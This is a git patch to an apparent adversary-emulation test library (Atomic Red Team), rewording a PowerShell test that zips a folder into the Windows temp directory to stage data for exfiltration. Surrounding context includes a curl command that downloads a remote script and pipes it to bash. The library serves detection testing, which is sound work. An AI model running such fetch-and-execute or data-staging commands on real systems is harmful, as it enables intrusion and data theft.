From b2d25ea9bcebd30ec1891c8c33b9c16cb011bf39 Mon Sep 17 00:00:00 2001
From: JB <35406993+cherokeejb@users.noreply.github.com>
Date: Mon, 6 Jan 2020 15:02:07 -0600
Subject: [PATCH] Updated atomic test 3 for better alignment with T1074
 (Staging) (#763)

Test was written previously for T1022 and then moved here; T1022 already has very similar tests, but it is useful here so just reworded test 3.
---
 atomics/T1074/T1074.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index c666c8bc..5acd87ee 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -29,15 +29,15 @@ atomic_tests:
     command: |
       curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
 
-- name: Zip a Folder with PowerShell
+- name: Zip a Folder with PowerShell for Staging in Temp
   description: |
-    use living off the land tools to encrypt and zip a file for exfiltration
+    Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
   supported_platforms:
     - windows
   executor:
     name: powershell
     elevation_required: false
     command: |
-      Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
+      Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
     cleanup_command: |
-      Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
+      Remove-Item -Path $env:TEMP\Folder_to_zip.zip